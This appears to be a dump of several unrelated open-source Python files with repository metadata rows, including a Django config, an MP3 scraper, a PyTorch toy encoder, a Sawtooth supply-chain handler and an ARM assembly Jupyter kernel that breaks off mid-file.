self.id_genre[genre['id']] = genre['name']
else:
movies_df.loc[index, 'genres'] = []
return movies_df
def transform_keywords_df(self, keywords_df) -> pd.DataFrame:
"""Converts keywords data in json format to list format.
storing only ids in keywords_df and separate dictionary for mappings
Args:
keywords_df (pd.DataFrame): raw keywords data
Returns:
pd.DataFrame: transformed dataframe
"""
self.id_keyword = {}
for index, row in keywords_df.iterrows():
keywords_json = row['keywords']
keyword_ids = []
if keywords_json.strip():
keywords_json = ast.literal_eval(keywords_json)
for key in keywords_json:
keyword_ids.append(key['id'])
self.id_keyword[key['id']] = key['name']
keywords_df.at[index, 'keywords'] = keyword_ids
return keywords_df
def transform_credits_df(self, credits_df) -> pd.DataFrame:
"""Converts json format in df to list format. Stores only ids in df
and ids mapping will be self.id_credit(dict)
Args:
credits_df (pd.DataFrame): raw credits data
Returns:
pd.DataFrame: transformed data
"""
self.id_credit = {}
for index, row in credits_df.iterrows():
cast_json = row['cast']
if cast_json.strip():
cast_json = ast.literal_eval(cast_json)
cast_ids = []
for cast in cast_json:
self.id_credit[cast['id']] = cast['name']
cast_ids.append(cast['id'])
credits_df.at[index, 'cast'] = cast_ids
crew_json = row['crew']
if crew_json.strip():
crew_json = ast.literal_eval(crew_json)
credits_df.at[index, 'crew'] = crew_json
return credits_df
class DataProcessing:
def __init__(self) -> None:
pass
if __name__ == '__main__':
data = Dataloding()
| 37.384106 | 81 | 0.583702 |
aae5f1d79a16e11baab64d302ca2965536e5380a | 95 | py | Python | coremodels/apps.py | pakponj/coursing-field | 0368c2fc546b3955dc1fef1fc00252d8f015f56d | [
"Apache-2.0"
] | null | null | null | coremodels/apps.py | pakponj/coursing-field | 0368c2fc546b3955dc1fef1fc00252d8f015f56d | [
"Apache-2.0"
] | null | null | null | coremodels/apps.py | pakponj/coursing-field | 0368c2fc546b3955dc1fef1fc00252d8f015f56d | [
"Apache-2.0"
] | null | null | null | from django.apps import AppConfig
class CoremodelsConfig(AppConfig):
name = 'coremodels'
| 15.833333 | 34 | 0.768421 |
aae6433bbacb013e1d4734b577daca4627358efe | 421 | py | Python | easy/1710-maximum-units-on-a-truck.py | changmeng72/leecode_python3 | 8384f52f0dd74b06b1b6aefa277dde6a228ff5f3 | [
"MIT"
] | null | null | null | easy/1710-maximum-units-on-a-truck.py | changmeng72/leecode_python3 | 8384f52f0dd74b06b1b6aefa277dde6a228ff5f3 | [
"MIT"
] | null | null | null | easy/1710-maximum-units-on-a-truck.py | changmeng72/leecode_python3 | 8384f52f0dd74b06b1b6aefa277dde6a228ff5f3 | [
"MIT"
] | null | null | null | class Solution:
def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:
boxTypes.sort(key=lambda x: x[1],reverse = True)
r = 0
remaining = truckSize
for boxType in boxTypes:
b = min(remaining,boxType[0])
r += b * boxType[1]
remaining -= b
if remaining==0:
break
return r
| 32.384615 | 78 | 0.489311 |
aae681f8c4e041d774adeeb9e3c2ebb127572c89 | 688 | py | Python | scripts/forms.py | ansa-aboudou/resumex | 8c546403495c6d0045af4530a3f8601f69035528 | [
"MIT"
] | null | null | null | scripts/forms.py | ansa-aboudou/resumex | 8c546403495c6d0045af4530a3f8601f69035528 | [
"MIT"
] | null | null | null | scripts/forms.py | ansa-aboudou/resumex | 8c546403495c6d0045af4530a3f8601f69035528 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from wtforms import Form, StringField, validators
class LoginForm(Form):
username = StringField('Username:', validators=[validators.required(), validators.Length(min=1, max=30)])
password = StringField('Password:', validators=[validators.required(), validators.Length(min=1, max=30)])
email = StringField('Email:', validators=[validators.optional(), validators.Length(min=0, max=50)])
class ProjectForm(Form):
title = StringField('Title:', validators=[validators.required(), validators.Length(min=1, max=1000)])
description = StringField('Description:', validators=[validators.optional(), validators.Length(min=0, max=10000)])
| 49.142857 | 119 | 0.710756 |
aae69a1c9858fa2062e072c3ac6fac72ce0dc685 | 334 | py | Python | OpenCV/assign1_2.py | Aanal2901/Autumn-of-Automation | c6ea432d3608652254b841c392dde6aa466b2df4 | [
"MIT"
] | null | null | null | OpenCV/assign1_2.py | Aanal2901/Autumn-of-Automation | c6ea432d3608652254b841c392dde6aa466b2df4 | [
"MIT"
] | null | null | null | OpenCV/assign1_2.py | Aanal2901/Autumn-of-Automation | c6ea432d3608652254b841c392dde6aa466b2df4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 24 00:44:49 2020
@author: Aanal Sonara
"""
import cv2
cap = cv2.VideoCapture(0)
while cap.isOpened():
_, frame = cap.read()
cv2.imshow("live video", frame)
k = cv2.waitKey(1) and 0xFF
if k==27:
break
cap.release()
cv2.destroyAllWindows() | 17.578947 | 36 | 0.577844 |
aae6ab08212b4b7afe1925bc3ddbf0db7587516e | 5,515 | py | Python | site_parser/site_parser.py | TheStalkerDen/Comp-Architecture-Lab1 | ad92aed0c639cb223adc033aba5f79cc6a8f5344 | [
"MIT"
] | null | null | null | site_parser/site_parser.py | TheStalkerDen/Comp-Architecture-Lab1 | ad92aed0c639cb223adc033aba5f79cc6a8f5344 | [
"MIT"
] | null | null | null | site_parser/site_parser.py | TheStalkerDen/Comp-Architecture-Lab1 | ad92aed0c639cb223adc033aba5f79cc6a8f5344 | [
"MIT"
] | null | null | null | import configparser
import os
import tempfile
import urllib.request
import xml.dom.minidom
import xml.etree.ElementTree as ET
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from tinytag import TinyTag
import gevent
dir_path = os.path.dirname(os.path.realpath(__file__))
CONFIG = configparser.ConfigParser()
CONFIG.read(os.path.join(dir_path, '../setting.cfg'))
USE_GEVENT = CONFIG['common'].getboolean('use_gevent')
def get_site_list_from_file(file_name):
root = ET.parse(file_name).getroot()
site_list = []
for child in root:
if child.tag == "site":
site_list.append(child.text)
return site_list
def get_mp3_genre_and_title(mp3_filename):
audio_tag = TinyTag.get(mp3_filename)
if audio_tag.genre is None:
audio_tag.genre = "Undefined"
if audio_tag.title is None:
audio_tag.title = "No-title"
return audio_tag.genre, audio_tag.title
def collect_all_links_from_html(html_page):
soup = BeautifulSoup(html_page, 'html.parser')
return [x.get('href') for x in soup.find_all('a')]
def get_all_links_from_url(url):
try:
main_page_req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
html_page = urllib.request.urlopen(main_page_req)
return collect_all_links_from_html(html_page)
except urllib.error.HTTPError:
return []
def convert_link_to_absolute(base_url, link):
url = urllib.parse.urljoin(base_url, link)
parsed_url = urllib.request.urlparse(url)
if parsed_url.scheme != "file":
return parsed_url.scheme + "://" + parsed_url.netloc + urllib.parse.quote(parsed_url.path)
else:
return url
def convert_links_to_absolute(base_url, links):
return [convert_link_to_absolute(base_url, link) for link in links]
def get_mp3_links(links, digest_level, *, use_gevent):
visited_links = set()
mp3_links = []
def _get_mp3_links(url, level):
visited_links.add(url)
_links = convert_links_to_absolute(url, get_all_links_from_url(url))
links_to_visit = []
for link in _links:
if link.endswith(".mp3"):
mp3_links.append(link)
elif level > 1:
req = urllib.request.Request(url, method="HEAD", headers={'User-Agent': 'Mozilla/5.0'})
response = urllib.request.urlopen(req)
if link.endswith("html") or response.getheader("Content-Type").startswith("text/html"):
links_to_visit.append(link)
if level > 1:
for link in links_to_visit:
if link not in visited_links:
_get_mp3_links(link, level - 1)
if use_gevent:
jobs = [gevent.spawn(_get_mp3_links, url, digest_level) for url in links]
gevent.joinall(jobs)
else:
for url in links:
_get_mp3_links(url, digest_level)
return mp3_links
def analyze_mp3_from_links(mp3_links, *, use_gevent):
analyzed_mp3_sorted_by_genre = {}
tmp_dir = tempfile.TemporaryDirectory(suffix='mp3')
def _analyze_mp3(mp3_link):
file_name = os.path.basename(urllib.parse.urlparse(mp3_link).path)
try:
print(f"Load {file_name}")
req = urllib.request.Request(mp3_link, headers={'User-Agent': 'Mozilla/5.0', "Range": "bytes:0-4000"})
with urllib.request.urlopen(req) as response, \
tempfile.NamedTemporaryFile(mode="w+b", delete=False, dir=tmp_dir.name) as out_file:
data = response.read()
out_file.write(data)
tmp_filename = out_file.name
genre, title = get_mp3_genre_and_title(tmp_filename)
if genre not in analyzed_mp3_sorted_by_genre:
analyzed_mp3_sorted_by_genre[genre] = []
analyzed_mp3_sorted_by_genre[genre].append({"filename": file_name, "title": title, "link": mp3_link})
except URLError:
pass
if use_gevent:
jobs = [gevent.spawn(_analyze_mp3, mp3_link) for mp3_link in mp3_links]
gevent.joinall(jobs)
else:
for mp3_link in mp3_links:
_analyze_mp3(mp3_link)
tmp_dir.cleanup()
return analyzed_mp3_sorted_by_genre
def generate_xml_res_string(sorted_by_genre_mp3):
root = ET.Element('Playlist')
for key, value in sorted_by_genre_mp3.items():
genre_node = ET.SubElement(root, 'Genre', {'name': key})
for mp3_info in value:
mp3_info_node = ET.SubElement(genre_node, 'music')
ET.SubElement(mp3_info_node, 'filename').text = mp3_info['filename']
ET.SubElement(mp3_info_node, 'title').text = mp3_info['title']
ET.SubElement(mp3_info_node, 'link').text = mp3_info['link']
mydata = ET.tostring(root, encoding="unicode")
preparsed = xml.dom.minidom.parseString(mydata)
return preparsed.toprettyxml().encode("utf-8")
def generate_xml_result_in_result_file(sorted_by_genre_mp3, result_file):
final_res = generate_xml_res_string(sorted_by_genre_mp3)
result_file.write(final_res)
def scrape_mp3_from_sites(input_filename, digest_level):
site_list = get_site_list_from_file(input_filename)
mp3_links = get_mp3_links(site_list, digest_level, use_gevent=USE_GEVENT)
analyzed_res = analyze_mp3_from_links(mp3_links, use_gevent=USE_GEVENT)
with open("../result.xml", "wb") as res_file:
generate_xml_result_in_result_file(analyzed_res, res_file)
| 36.282895 | 114 | 0.677244 |
aae7a8e4bea1bfaeb77207d29d33884bce510446 | 4,341 | py | Python | project/encoder_toy.py | tkosht/wikiencoder | c1744e60e902949e1926c9efe0c24eb3ac5f00fd | [
"MIT"
] | null | null | null | project/encoder_toy.py | tkosht/wikiencoder | c1744e60e902949e1926c9efe0c24eb3ac5f00fd | [
"MIT"
] | null | null | null | project/encoder_toy.py | tkosht/wikiencoder | c1744e60e902949e1926c9efe0c24eb3ac5f00fd | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import numpy
import torch
import torchnet
from tqdm import tqdm
from torchnet.engine import Engine
from torchnet.logger import VisdomPlotLogger, VisdomLogger
import project.deco as deco
from project.sequoder import SequenceEncoder, get_loss
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true", default=False,
help="if you specified, execute as debug mode. default: 'False'")
parser.add_argument("--trace", action="store_true", default=False,
help="if you specified, execute as trace mode. default: 'False'")
# parser.add_argument("-i", "--indir", type=str, default="data/parsed",
# help="you can specify the string of the input directory"
# " must includes subdir 'doc/', and 'title/'. default: 'data/parsed'")
parser.add_argument("--epochs", type=int, default="500")
parser.add_argument("--lr", type=float, default="0.001")
parser.add_argument("--weight-decay", type=float, default="0")
args = parser.parse_args()
return args
def get_toydata(n_data, device):
toydata = []
for _n in range(n_data):
t = numpy.random.randint(5) + 2
seq = [torch.randn(1, 3) for _t in range(t)] # make a sequence of length 5
seq = torch.stack(seq)
seq = seq.to(device)
toydata.append(seq)
return toydata
def reverse_tensor(tensor, device=torch.device("cpu")):
indices = [i for i in range(tensor.size(0)-1, -1, -1)]
indices = torch.LongTensor(indices).to(device)
rev_tensor = tensor.index_select(0, indices)
return rev_tensor
@deco.trace
@deco.excep(return_code=True)
def main():
args = get_args()
device = torch.device("cuda:1")
# device = torch.device("cpu")
model = SequenceEncoder(3, 2, device)
n_data = 10
data = get_toydata(n_data, device)
teacher = [reverse_tensor(seq, device) for seq in data]
training_data = (data, teacher)
optim_params = {
"params": model.parameters(),
"weight_decay": args.weight_decay,
"lr": args.lr,
}
optimizer = torch.optim.Adam(**optim_params)
meter_loss = torchnet.meter.AverageValueMeter()
port = 8097
train_loss_logger = VisdomPlotLogger(
'line', port=port, opts={'title': 'encoder_toy - train loss'})
def network(sample):
x = sample[0] # sequence
t = sample[1] # target sequence
y, mu, logvar = model(x)
loss = get_loss(y, t, mu, logvar)
o = y, mu, logvar
return loss, o
def reset_meters():
meter_loss.reset()
def on_sample(state):
state['sample'] = list(state['sample'])
state['sample'].append(state['train'])
model.zero_grad()
model.init_hidden()
def on_forward(state):
loss_value = state['loss'].data
meter_loss.add(state['loss'].data)
def on_start_epoch(state):
reset_meters()
if 'dataset' not in state:
dataset = state['iterator']
state['dataset'] = dataset
dataset = state['dataset']
state['iterator'] = tqdm(zip(*dataset))
def on_end_epoch(state):
loss_value = meter_loss.value()[0]
epoch = state['epoch']
print(f'loss[{epoch}]: {loss_value:.4f}')
train_loss_logger.log(epoch, loss_value)
dataset = state['dataset']
state['iterator'] = tqdm(zip(*dataset))
engine = Engine()
engine.hooks['on_sample'] = on_sample
engine.hooks['on_forward'] = on_forward
engine.hooks['on_start_epoch'] = on_start_epoch
engine.hooks['on_end_epoch'] = on_end_epoch
engine.train(network, training_data, maxepoch=args.epochs, optimizer=optimizer)
# loss_records = model.do_train(training_data, args.epochs, optimizer)
# def save_fig(x, img_file):
# pyplot.plot(range(len(x)), x)
# pathlib.Path(img_file).parent.mkdir(parents=True, exist_ok=True)
# pyplot.savefig(img_file)
# save_fig(loss_records, "results/loss_toydata.png")
if __name__ == '__main__':
r = main()
if r != 0:
logfile = deco.logger.logger.handlers[0].baseFilename
print(f"Abort with error. see logfile '{logfile}'")
exit(r)
| 31.919118 | 95 | 0.628657 |
aae827e1c08cf7a4934daf6680f0a298b8d6f043 | 18,420 | py | Python | families/supplychain_python/sawtooth_supplychain/processor/handler.py | trust-tech/sawtooth-core | fcd66ff2f13dba51d7642049e0c0306dbee3b07d | [
"Apache-2.0"
] | null | null | null | families/supplychain_python/sawtooth_supplychain/processor/handler.py | trust-tech/sawtooth-core | fcd66ff2f13dba51d7642049e0c0306dbee3b07d | [
"Apache-2.0"
] | null | null | null | families/supplychain_python/sawtooth_supplychain/processor/handler.py | trust-tech/sawtooth-core | fcd66ff2f13dba51d7642049e0c0306dbee3b07d | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import logging
import json
from sawtooth_sdk.processor.state import StateEntry
from sawtooth_sdk.processor.exceptions import InvalidTransaction
from sawtooth_sdk.processor.exceptions import InternalError
from sawtooth_sdk.protobuf.transaction_pb2 import TransactionHeader
import sawtooth_supplychain.addressing as addressing
LOGGER = logging.getLogger(__name__)
SUPPLYCHAIN_VERSION = '0.5'
SUPPLYCHAIN_NAMESPACE = 'Supplychain'
def state_get_single(state, uid):
entries_list = state.get([uid])
if entries_list:
return json.loads(entries_list[0].data.decode())
return None
def state_put_single(state, uid, data):
addresses = state.set(
[StateEntry(address=uid,
data=json.dumps(data, sort_keys=True).encode())])
if not addresses or uid not in addresses:
raise InternalError("Error setting state, addresses returned: %s.",
addresses)
class SupplychainHandler(object):
def __init__(self):
pass
@property
def family_name(self):
return 'sawtooth_supplychain'
@property
def family_versions(self):
return ['1.0']
@property
def encodings(self):
return ['application/json']
@property
def namespaces(self):
return [addressing.get_namespace()]
def apply(self, transaction, state):
payload = json.loads(transaction.payload.decode())
LOGGER.debug("SupplychainHandler.apply: %s", repr(payload))
if payload['MessageType'] == 'Record':
RecordHandler.apply(transaction, state)
elif payload['MessageType'] == 'Agent':
AgentHandler.apply(transaction, state)
class RecordHandler(object):
@classmethod
def apply(cls, transaction, state):
payload = json.loads(transaction.payload.decode())
LOGGER.debug("apply payload: %s", repr(payload))
tnx_action = payload.get('Action', None)
txnrecord_id = payload.get('RecordId', None)
header = TransactionHeader()
header.ParseFromString(transaction.header)
tnx_originator = addressing.get_agent_id(header.signer_pubkey)
# Retrieve the stored record data if an ID is provided.
record_id = txnrecord_id
record_store_key = record_id
record_store = state_get_single(state, record_store_key)
# Check Action
if tnx_action == 'Create':
if txnrecord_id is None:
raise InvalidTransaction(
'Record id expected for CreateRecord')
record_store = {}
cls.create_record(tnx_originator, record_id, payload,
state, record_store)
elif tnx_action == "CreateApplication":
if txnrecord_id is None:
raise InvalidTransaction(
'Record id expected for create_application')
cls.create_application(tnx_originator, record_id, payload,
state, record_store)
elif tnx_action == "AcceptApplication":
if txnrecord_id is None:
raise InvalidTransaction(
'Record id expected for accept_application')
cls.accept_application(tnx_originator, record_id, payload,
state, record_store)
elif tnx_action == "RejectApplication":
if txnrecord_id is None:
raise InvalidTransaction(
'Record id expected for reject_application')
cls.reject_application(tnx_originator, record_id, payload,
state, record_store)
elif tnx_action == "CancelApplication":
if txnrecord_id is None:
raise InvalidTransaction(
'Record id expected for cancel_application')
cls.cancel_application(tnx_originator, record_id, payload,
state, record_store)
elif tnx_action == "Finalize":
if txnrecord_id is None:
raise InvalidTransaction(
'Record id expected for Finalize')
cls.finalize_record(tnx_originator, record_id, payload,
state, record_store)
else:
raise InvalidTransaction('Action {} is not valid'.
format(tnx_action))
# Store the record data back
state_put_single(state, record_store_key, record_store)
@classmethod
def create_record(cls, originator, record_id, payload, state, my_store):
sensor_id = payload.get('Sensor', None)
sensor_idx = None
if sensor_id is not None:
sensor_idx = addressing.get_sensor_id(sensor_id)
record_info = {}
# Owner set below
record_info['CurrentHolder'] = originator
# Custodians set below
record_info['Parents'] = payload.get('Parents', None)
record_info['Timestamp'] = payload.get('Timestamp')
record_info['Sensor'] = sensor_idx
record_info['Final'] = False
record_info['ApplicationFrom'] = None
record_info['ApplicationType'] = None
record_info['ApplicationTerms'] = None
record_info['ApplicationStatus'] = None
record_info['EncryptedConsumerAcccessible'] = None
record_info['EncryptedOwnerAccessible'] = None
my_store['RecordInfo'] = record_info
my_store['StoredTelemetry'] = payload.get('Telemetry', {})
my_store['DomainAttributes'] = payload.get('DomainAttributes', {})
# Determine if this record has parents
has_parents = record_info['Parents'] is not None and \
len(record_info['Parents']) > 0
# If there are parents update Owner and Custodian depending on the
# ApplicationType
if has_parents:
# Use the first parent
parent_id = record_info['Parents'][0]
parent_store = state_get_single(state, parent_id)
if parent_store['RecordInfo']['ApplicationType'] == "Owner":
# Transfer ownership - in this case there should be
# no custodians.
if not parent_store['RecordInfo']['Custodians']:
raise InvalidTransaction(
"Cannot transfer ownership when custodian is present")
record_info['Owner'] = originator
record_info['Custodians'] = []
else:
# Transfer custodianship
record_info['Owner'] = \
parent_store['RecordInfo']['Owner']
record_info['Custodians'] = \
list(parent_store['RecordInfo']['Custodians'])
# Check the next to last element of the Custodians array. If it
# is the new holder, then this is a 'pop' operation. It's also
# a pop if here is one custodian and the applicant is the
# owner.
is_pop = False
if len(record_info['Custodians']) > 1 and \
record_info['Custodians'][-2] == originator:
is_pop = True
elif len(record_info['Custodians']) == 1 and \
record_info['Owner'] == originator:
is_pop = True
if is_pop:
record_info['Custodians'].pop()
else:
record_info['Custodians'].append(originator)
else:
# No parents, just create a new record
record_info['Owner'] = originator
record_info['Custodians'] = []
# If there are parents mark them as final.
if has_parents:
for parent in record_info['Parents']:
parent_store = state_get_single(state, parent)
parent_store['RecordInfo']['Final'] = True
state_put_single(state, parent, parent_store)
# Remove the record from the former owner - even if this
# is a custodian transfer we need to store the new
# record ID with the owner.
AgentHandler.remove_record_owner(
state,
parent_store['RecordInfo']["Owner"],
parent)
# Remove the previous holder
AgentHandler.remove_record_holder(
state,
parent_store['RecordInfo']["CurrentHolder"],
parent)
# Remove the accepted application from the new owner
AgentHandler.remove_accepted_application(
state,
parent_store['RecordInfo']['ApplicationFrom'],
parent)
# Record the owner of the new record in the agent
AgentHandler.add_record_owner(
state, record_info["Owner"], record_id,
record_info["Owner"] == record_info["CurrentHolder"])
# Record the new record holder in the agent
AgentHandler.add_record_holder(
state, record_info["CurrentHolder"], record_id)
# Register the sensor
if sensor_id is not None:
if state_get_single(state, sensor_idx) is not None:
sensor_store = state_get_single(state, sensor_idx)
else:
sensor_store = {}
sensor_store["Record"] = record_id
sensor_store["Name"] = sensor_id
state_put_single(state, sensor_idx, sensor_store)
@classmethod
def create_application(cls, originator, record_id,
payload, state, my_store):
LOGGER.debug('create_application: %s', my_store)
record_info = my_store['RecordInfo']
LOGGER.debug(record_info)
# Agent ID who initiated the application
record_info['ApplicationFrom'] = originator
# custodian or owner
record_info['ApplicationType'] = payload['ApplicationType']
# Should be encrypted?
record_info['ApplicationTerms'] = payload['ApplicationTerms']
# To indicate acceptance (or not) of the application.
record_info['ApplicationStatus'] = "Open"
LOGGER.debug(record_info)
# Record the new application in the current holder
AgentHandler.add_open_application(state,
record_info['ApplicationFrom'],
record_info['CurrentHolder'],
record_id)
@classmethod
def accept_application(cls, originator, record_id, payload, state,
my_store):
# Mark the application as accepted. After this the new
# owner/custodian is able to make a new record with this
# record as the parent.
record_info = my_store['RecordInfo']
record_info['ApplicationStatus'] = "Accepted"
# Record the accepted application in the new holder
AgentHandler.remove_open_application(state,
record_info['ApplicationFrom'],
record_info['CurrentHolder'],
record_id)
AgentHandler.add_accepted_application(state,
record_info['ApplicationFrom'],
record_id,
record_info['Sensor'])
@classmethod
def reject_application(cls, originator, record_id, payload, state,
my_store):
# Mark the application as rejected.
record_info = my_store['RecordInfo']
record_info['ApplicationStatus'] = "Rejected"
# Record the rejected application in the agent
AgentHandler.remove_open_application(state,
record_info['ApplicationFrom'],
record_info['CurrentHolder'],
record_id)
@classmethod
def cancel_application(cls, originator, record_id, payload, state,
my_store):
# Mark the application as cancelled.
record_info = my_store['RecordInfo']
record_info['ApplicationStatus'] = "Cancelled"
# Record the cancelled application in the agent
AgentHandler.remove_open_application(state,
record_info['ApplicationFrom'],
record_info['CurrentHolder'],
record_id)
@classmethod
def finalize_record(cls, originator, record_id, payload, state, my_store):
record_info = my_store['RecordInfo']
record_info['Final'] = True
# Remove the record from the agent
if record_info['Owner'] != originator:
raise InvalidTransaction('Only the current owner can finalize')
if record_info['CurrentHolder'] != originator:
raise InvalidTransaction('Only the current holder can finalize')
AgentHandler.remove_record_owner(state, originator, record_id)
AgentHandler.remove_record_holder(state, originator, record_id)
class AgentHandler(object):
@classmethod
def apply(cls, transaction, state):
payload = json.loads(transaction.payload.decode())
LOGGER.debug("AgentHandler.apply payload: %s", repr(payload))
tnx_action = payload.get('Action', None)
tnx_name = payload.get('Name', None)
tnx_type = payload.get('Type', None)
tnx_url = payload.get('Url', None)
header = TransactionHeader()
header.ParseFromString(transaction.header)
uid = addressing.get_agent_id(header.signer_pubkey)
if tnx_name is None or tnx_name == '':
raise InvalidTransaction('Name not set')
if tnx_action == "Create":
LOGGER.debug("AgentHandler.apply CREATE")
if state_get_single(state, uid) is not None:
raise InvalidTransaction('Agent ID already registered')
my_store = {}
my_store['Name'] = tnx_name
my_store['Type'] = tnx_type
my_store['Url'] = tnx_url
my_store['OwnRecords'] = {}
my_store['HoldRecords'] = {}
my_store['OpenApplications'] = {}
my_store['AcceptedApplications'] = {}
state_put_single(state, uid, my_store)
else:
raise InvalidTransaction('Action {} is not valid'.
format(tnx_action))
@classmethod
def update_record_tracking(cls, state, agent_id, updates):
state_id = agent_id
my_store = state_get_single(state, state_id)
if my_store is None:
raise InvalidTransaction("Identifer {} is not present in store".
format(state_id))
for update in updates:
(field, record_id, value, exists_is_ok) = update
if value == "del":
if record_id not in my_store[field]:
raise InvalidTransaction(
"Record {} is not present in state".format(record_id))
del my_store[field][record_id]
else:
if not exists_is_ok and record_id in my_store[field]:
raise InvalidTransaction(
"Record {} is already present in state".
format(record_id))
my_store[field][record_id] = value
state_put_single(state, state_id, my_store)
@classmethod
def add_record_owner(cls, state, identifier, record_id, own_and_hold):
value = 1 if own_and_hold else 0
AgentHandler.update_record_tracking(
state, identifier, [("OwnRecords", record_id, value, True)])
@classmethod
def remove_record_owner(cls, state, identifier, record_id):
AgentHandler.update_record_tracking(
state, identifier, [("OwnRecords", record_id, "del", False)])
@classmethod
def add_record_holder(cls, state, identifier, record_id):
AgentHandler.update_record_tracking(
state, identifier, [("HoldRecords", record_id, 0, False)])
@classmethod
def remove_record_holder(cls, state, identifier, record_id):
AgentHandler.update_record_tracking(
state, identifier, [("HoldRecords", record_id, "del", False)])
@classmethod
def add_open_application(cls, state, applier_id, holder_id, record_id):
AgentHandler.update_record_tracking(
state, applier_id, [("OpenApplications", record_id, 1, False)])
AgentHandler.update_record_tracking(
state, holder_id, [("HoldRecords", record_id, 1, True)])
@classmethod
def remove_open_application(cls, state, applier_id, holder_id, record_id):
AgentHandler.update_record_tracking(
state, applier_id,
[("OpenApplications", record_id, "del", False)])
AgentHandler.update_record_tracking(
state, holder_id,
[("HoldRecords", record_id, 0, True)])
@classmethod
def add_accepted_application(cls, state, identifier, record_id, sensor_id):
AgentHandler.update_record_tracking(
state, identifier,
[("AcceptedApplications", record_id, sensor_id, False)])
@classmethod
def remove_accepted_application(cls, state, identifier, record_id):
AgentHandler.update_record_tracking(
state, identifier,
[("AcceptedApplications", record_id, "del", False)])
| 40.394737 | 80 | 0.591205 |
aaebd6d86a473c46810168a0f679eb02f758b767 | 875 | py | Python | pretoinf.py | nirmalya8/CalculateAndConvert | 07eb954e2ac5960363637079bc8c179edec37a69 | [
"CC-BY-3.0"
] | 1 | 2021-01-11T09:01:51.000Z | 2021-01-11T09:01:51.000Z | pretoinf.py | nirmalya8/CalculateAndConvert | 07eb954e2ac5960363637079bc8c179edec37a69 | [
"CC-BY-3.0"
] | null | null | null | pretoinf.py | nirmalya8/CalculateAndConvert | 07eb954e2ac5960363637079bc8c179edec37a69 | [
"CC-BY-3.0"
] | 1 | 2021-01-10T09:25:45.000Z | 2021-01-10T09:25:45.000Z | class prefixtoinfix:
def prefixToInfix(self,prefix):
stack = []
l = []
# read prefix in reverse order
i = len(prefix) - 1
for j in prefix:
if j == ' ':
return [],False
while i >= 0:
if not self.isOperator(prefix[i]):
# symbol is operand
stack.append(prefix[i])
i -= 1
else:
# symbol is operator
str = "(" + stack.pop() + prefix[i] + stack.pop() + ")"
l.append(str)
stack.append(str)
i -= 1
return l,stack.pop()
def isOperator(self,c):
if c == "*" or c == "+" or c == "-" or c == "/" or c == "^" or c == "(" or c == ")":
return True
else:
return False | 29.166667 | 92 | 0.377143 |
aaebe47258a943fd8be9436d233e4c883e9d3710 | 13,212 | py | Python | iarm_kernel/iarmkernel.py | howardjp/iMCS-48 | b545a37a9b15fdcdacb4e2ba263f45a9c62df079 | [
"MIT"
] | 20 | 2016-05-16T18:23:49.000Z | 2021-08-06T17:15:34.000Z | iarm_kernel/iarmkernel.py | howardjp/iMCS-48 | b545a37a9b15fdcdacb4e2ba263f45a9c62df079 | [
"MIT"
] | 11 | 2016-07-14T17:57:10.000Z | 2020-11-18T21:11:21.000Z | iarm_kernel/iarmkernel.py | howardjp/iMCS-48 | b545a37a9b15fdcdacb4e2ba263f45a9c62df079 | [
"MIT"
] | 4 | 2016-08-14T19:11:21.000Z | 2021-08-18T09:38:25.000Z | from ipykernel.kernelbase import Kernel
from iarm.arm import Arm
import re
import warnings
import iarm.exceptions
class ArmKernel(Kernel):
implementation = 'IArm'
implementation_version = '0.1.0'
language = 'ARM'
language_version = iarm.__version__
language_info = {
'name': 'ARM Coretex M0+ Thumb Assembly',
'mimetype': 'text/x-asm',
'file_extension': '.s'
}
banner = "Interpreted ARM"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interpreter = Arm(1024) # 1K memory
self.magics = {
'run': self.magic_run,
'register': self.magic_register,
'reg': self.magic_register,
'memory': self.magic_memory,
'mem': self.magic_memory,
'signed': self.magic_signed_rep,
'unsigned': self.magic_unsigned_rep,
'hex': self.magic_hex_rep,
'help': self.magic_help,
'generate_random': self.magic_generate_random,
'postpone_execution': self.magic_postpone_execution
}
self.number_representation = ''
self.magic_unsigned_rep('') # Default to unsigned representation
def convert_representation(self, i):
"""
Return the proper representation for the given integer
"""
if self.number_representation == 'unsigned':
return i
elif self.number_representation == 'signed':
if i & (1 << self.interpreter._bit_width - 1):
return -((~i + 1) & (2**self.interpreter._bit_width - 1))
else:
return i
elif self.number_representation == 'hex':
return hex(i)
def magic_generate_random(self, line):
"""
Set the generate random flag, unset registers and memory will return a random value.
Usage:
Call the magic by itself or with `true` to have registers and memory return a random value
if they are unset and read from, much like how real hardware would work.
Defaults to False, or to not generate random values
`%generate_random`
or
`%generate_random true`
or
`%generate_random false`
"""
line = line.strip().lower()
if not line or line == 'true':
self.interpreter.generate_random = True
elif line == 'false':
self.interpreter.generate_random = False
else:
stream_content = {'name': 'stderr', 'text': "unknwon value '{}'".format(line)}
self.send_response(self.iopub_socket, 'stream', stream_content)
return {'status': 'error',
'execution_count': self.execution_count,
'ename': ValueError.__name__,
'evalue': "unknwon value '{}'".format(line),
'traceback': '???'}
def magic_postpone_execution(self, line):
"""
Postpone execution of instructions until explicitly run
Usage:
Call this magic with `true` or nothing to postpone execution,
or call with `false` to execute each instruction when evaluated.
This defaults to True.
Note that each cell is executed only executed after all lines in
the cell have been evaluated properly.
`%postpone_execution`
or
`%postpone_execution true`
or
`%postpone_execution false`
"""
line = line.strip().lower()
if not line or line == 'true':
self.interpreter.postpone_execution = True
elif line == 'false':
self.interpreter.postpone_execution = False
else:
stream_content = {'name': 'stderr', 'text': "unknwon value '{}'".format(line)}
self.send_response(self.iopub_socket, 'stream', stream_content)
return {'status': 'error',
'execution_count': self.execution_count,
